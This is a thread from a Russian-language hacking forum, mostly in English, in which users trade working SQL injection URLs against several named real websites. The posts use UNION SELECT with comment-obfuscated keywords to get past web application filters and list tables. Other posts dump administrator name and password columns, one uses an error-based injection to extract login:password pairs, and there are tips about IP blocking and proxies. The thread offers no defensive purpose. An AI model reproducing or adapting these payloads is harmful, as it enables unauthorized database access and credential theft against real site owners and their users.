27.11.2011, 22:56
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Thank you so much.
I've learnt it now.
Need a little help here.
Код:
http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,2,3,4,version(),6,7,8,9,10,11,12--
How to get tables, columns and data? |
|
|
27.11.2011, 23:37
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
lightangel
There are tables
Код:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,group_concat%28TABLE_NAME%29,6,7,8,9,10,11,12/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Admins[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]access[/COLOR][/COLOR]
|
|
|
|
28.11.2011, 01:16
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Aydin-ka, thanks a lot.
Код:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--
It's a basic WAF..
I've got the tables and columns and now I try this.
Код:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/Admins--
Any solution? |
|
|
|
28.11.2011, 01:22
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от lightangel
Aydin-ka, thanks a lot.
Код:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--
It's a basic WAF..
I've got the tables and columns and now I try this.
Код:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/Admins--
Any solution? table in other db.
http://www.shopoldcoloradocity.com/content.php?id=-1/**/UnIoN/**/SeLeCt/**/1,2,3,4,concat(Name,0x3a,Password),6,7,8,9,10,11,1 2/**/FrOm/**/dolphin_eval.Admins
|
|
|
|
28.11.2011, 01:37
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...
|
|
|
|
28.11.2011, 02:00
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от shadowrun
http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...
избавиться от union можно с помощью error based например.
Код HTML:
http://www.poetryclub.com.ua/contest.php?id=29+or+1+group+by+concat((select+concat(login,0x3a,password)+from+admins),floor(rand(0)*2))having+min(0)--
|
|
|
|
28.11.2011, 02:22
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
I have a little problem here.
Код:
http://www.mul.edu.pk/home_old/index.php?id=39+order+by+20--
Shows 20 strings, now to get union select
Код:
http://www.mul.edu.pk/home_old/index.php?id=39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Shows this error
Код:
Not Acceptable
An appropriate representation of the requested resource /home_old/index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Код:
http://www.mul.edu.pk/home_old/index.php?id=39/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
The same error? Why this? |
|
|
|
28.11.2011, 02:35
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Что вы подразумеваете под этим?
|
|
|
|
28.11.2011, 02:38
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от lightangel
Что вы подразумеваете под этим?
во как)
значит в состоянии читать по русски.
http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
а на этом сайте блокируется ип после нескольких запросов, поэтому заморачиваться с проксями не хочется. good luck.
|
|
|
|
28.11.2011, 02:59
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Thanks so much. I'll use it.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
